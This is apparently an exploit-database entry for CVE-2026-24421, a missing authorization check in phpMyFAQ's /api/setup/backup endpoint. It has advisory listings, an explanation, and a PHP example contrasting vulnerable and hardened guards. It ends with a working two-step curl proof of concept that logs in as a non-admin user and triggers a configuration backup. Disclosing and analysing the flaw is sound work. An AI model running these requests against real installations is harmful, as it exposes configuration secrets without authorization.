| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2026-24421 | 24 Jan 2026 01:43 | – | attackerkb |
| CVE-2026-24421 | 23 Jan 2026 19:02 | – | circl |
| phpMyFAQ security vulnerabilities | 24 Jan 2026 00:00 | – | cnnvd |
| CVE-2026-24421 | 24 Jan 2026 01:43 | – | cve |
| CVE-2026-24421 phpMyFAQ missing authorization exposes /api/setup/backup to any authenticated user | 24 Jan 2026 01:43 | – | cvelist |
| EUVD-2026-4258 | 24 Jan 2026 01:43 | – | euvd |
| phpMyFAQ: /api/setup/backup accessible to any authenticated user (authz missing) | 23 Jan 2026 20:17 | – | github |
| CVE-2026-24421 | 24 Jan 2026 02:15 | – | nvd |
| CVE-2026-24421 phpMyFAQ missing authorization exposes /api/setup/backup to any authenticated user | 24 Jan 2026 01:43 | – | osv |
| GHSA-WM8H-26FV-MG7G phpMyFAQ: /api/setup/backup accessible to any authenticated user (authz missing) | 23 Jan 2026 20:17 | – | osv |
# Exploit Title: phpMyFAQ <= 4.0.16 - Improper Authorization
# Google Dork: N/A
# Date: 2026-01-23
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: https://www.phpmyfaq.de/
# Software Link: https://www.phpmyfaq.de/download/
# Version: <= 4.0.16 (REQUIRED)
# Tested on: Ubuntu 22.04, Apache 2.4.52, PHP 8.2.x, MariaDB 10.6.x
# CVE: CVE-2026-24421
## Summary
Authenticated non-admin users can call /api/setup/backup and trigger a configuration backup. The endpoint checks authentication but does not enforce authorization (missing configuration/admin permission check), and returns a link/path to the generated ZIP.
## Details
SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged-in user to create a sensitive backup and retrieve its path.
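The two guard shapes side by side, as an added example that is not phpMyFAQ's code: the authenticated-only check the advisory describes, and a guard that also requires a configuration permission and logs denials. The `User` class, `requirePermission()`, the `edit_configuration` permission name and the ZIP path are hypothetical.

```php
<?php
// Added example, not phpMyFAQ code. Contrasts an authenticated-only guard, as
// described for /api/setup/backup, with one that also checks a permission.
// User, requirePermission() and 'edit_configuration' are hypothetical names;
// the ZIP path returned below is a constructed placeholder.
declare(strict_types=1);
final class User
{
    public function __construct(private ?string $name, private array $perms = []) {}
    public function isAuthenticated(): bool { return $this->name !== null; }
    public function name(): string { return $this->name ?? 'anonymous'; }
    public function can(string $perm): bool { return in_array($perm, $this->perms, true); }
}
/** Vulnerable shape: the caller must be logged in, but any logged-in user passes. */
function backupAuthnOnly(User $user): array
{
    if (!$user->isAuthenticated()) {
        return ['status' => 401, 'body' => ['error' => 'login required']];
    }
    return ['status' => 200, 'body' => ['backup' => 'example-backup.zip']];
}
/** Returns an error response when the caller lacks $perm, or null when allowed. */
function requirePermission(User $user, string $perm): ?array
{
    if (!$user->isAuthenticated()) {
        return ['status' => 401, 'body' => ['error' => 'login required']];
    }
    if (!$user->can($perm)) {
        // Log the denial: repeated 403s on a setup endpoint are a detection signal.
        error_log(sprintf('authz denied user=%s perm=%s', $user->name(), $perm));
        return ['status' => 403, 'body' => ['error' => 'forbidden']];
    }
    return null;
}
/** Hardened shape: authentication plus a configuration permission, deny by default. */
function backupWithAuthz(User $user): array
{
    $denied = requirePermission($user, 'edit_configuration');
    return $denied ?? ['status' => 200, 'body' => ['backup' => 'example-backup.zip']];
}
// Constructed callers: a plain authenticated user, an admin, and an anonymous request.
$callers = ['tester' => new User('tester'),
            'admin' => new User('admin', ['edit_configuration']),
            'anonymous' => new User(null)];
foreach ($callers as $label => $u) {
    printf("%-9s authn-only=%d  with-authz=%d\n", $label,
        backupAuthnOnly($u)['status'], backupWithAuthz($u)['status']);
}
```

Run with `php example.php`; the plain user is accepted by the authenticated-only guard and refused with 403 by the permission guard, while the anonymous caller gets 401 from both.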
## PoC
Precondition: API enabled, any authenticated non-admin user.
1) Log in as a non-admin user:
```bash
curl -c /tmp/pmf_api_cookies.txt \
  -H 'Content-Type: application/json' \
  -d '{"username":"tester","password":"Test1234!"}' \
  http://192.168.40.16/phpmyfaq/api/v3.0/login
```
2) Trigger backup generation:
```bash
curl -i -b /tmp/pmf_api_cookies.txt \
  -X POST --data '4.0.16' \
  http://192.168.40.16/phpmyfaq/api/setup/backup
```
## Expected Result
The API responds successfully and includes a link/path to the generated ZIP backup even though the caller is not an admin / does not have configuration-edit permissions.
## Impact
Low-privileged users can generate sensitive backups. If the ZIP is web-accessible (server misconfiguration), this can lead to exposure of secrets/configuration and facilitate follow-on compromise.
## References
- GitHub Advisory: GHSA-wm8h-26fv-mg7g